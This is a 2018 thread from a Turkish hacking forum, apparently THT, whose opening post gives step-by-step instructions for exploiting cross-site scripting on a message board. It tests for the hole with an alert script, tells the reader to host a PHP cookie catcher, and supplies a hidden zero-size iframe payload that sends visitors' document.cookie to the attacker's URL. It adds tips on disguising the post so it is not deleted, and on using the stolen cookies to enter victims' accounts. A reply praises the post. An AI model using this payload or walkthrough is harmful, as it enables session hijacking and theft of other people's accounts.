THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

XSS Açıklı Site Hacklemek

co admir - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2013
Mesajlar:
1.950
Konular:
530
Teşekkür (Etti):
468
Teşekkür (Aldı):
751
Ticaret:
(0) %
08-09-2018 05:31
#1
XSS Açıklı Site Hacklemek




1
İçerik yayınlayabileceğiniz hassas bir site bulun. Mesaj panosu iyi bir örnek. Unutmayın, site güvenli ise o zaman işe yaramaz.

Kod:
window.alert(“test”) 
window.alert(“test”)window.alert(“test”)


2
Bir gönderi oluşturmaya gidin. Üzerine tıklayan herkesin verilerini yakalayacak “post” a bazı özel kodlar yazmanız gerekecektir.
Sistemin kodu filtrelediğini görmek için test etmek istersiniz. posta

Kod:
<script>window.alert(“test”)</script>
Gönderinizi tıklattığınızda bir uyarı kutusu görünürse, site saldırıya açıktır.



3
Çerez yakalayıcınızı oluşturun ve yükleyin. Bu saldırının amacı, bir kullanıcının çerezlerini yakalamaktır. Bu, hassas girişlere sahip web siteleri için kendi hesaplarına erişmenizi sağlar. Hedefinizin çerezlerini yakalayacak ve onları yeniden yönlendirecek bir çerez yakalayıcısına ihtiyacınız olacak. Yakalayıcıyı, erişiminiz olan ve php'yi destekleyen bir web sitesine yükleyin. Örnek bölümde bir örnek çerez yakalayıcı kodu bulunabilir.



Çerez yakalayıcınızla gönderin. Çerezleri yakalayacak ve sitenize gönderecek uygun bir kodu posta kutusuna girin. Şüpheyi azaltmak ve yayının silinmesini önlemek için koddan sonra bir miktar metin koymak isteyeceksiniz.
Örnek bir kod benziyor

Kod:
<iframe frameborder="0" height="0" width="0" src="javascript...:vo id(doc ument.lo cation='YOURURL/cookiecatcher.php?c=' doc ument.co okie)></iframe>


5
Toplanan çerezleri kullanın. Bundan sonra, ihtiyacınız olan herhangi bir amaç için web sitenize kaydedilmesi gereken çerez bilgilerini kullanabilirsiniz.
--------------------- .Hͫ̆̒̐ͣ̊̄ͯ͗͏̵̗̻̰̠̬͝ͅE̴̷̬͎̱̘͇͍̾ͦ͊͒͊̓̓̐_̫̠̱̩̭̤͈̑̎̋ͮͩ ̒͑̾͋͘Ç̳͕̯̭̱̲̣̠̜͋̍O̴̦̗̯̹̼ͭ̐ͨ̊̈͘͠M̶̝̠̭̭̤̻͓͑̓̊ͣͤ̎͟͠E̢ ̞̮̹͍̞̳̣ͣͪ͐̈T̡̯̳̭̜̠͕͌̈́̽̿ͤ̿̅̑Ḧ̱̱̺̰̳̹̘̰́̏ͪ̂̽͂̀͠.Ƞ.ȡ. _҇
Konu co admir tarafından (08-09-2018 06:26 Saat 06:26 ) değiştirilmiştir.
devilraw - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2018
Mesajlar:
165
Konular:
17
Teşekkür (Etti):
6
Teşekkür (Aldı):
19
Ticaret:
(0) %
08-09-2018 09:02
#2
Eline sağlık
---------------------
"Türk budur: Yildirimdir, kasirgadir, dünyayi aydinlatan günestir."

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler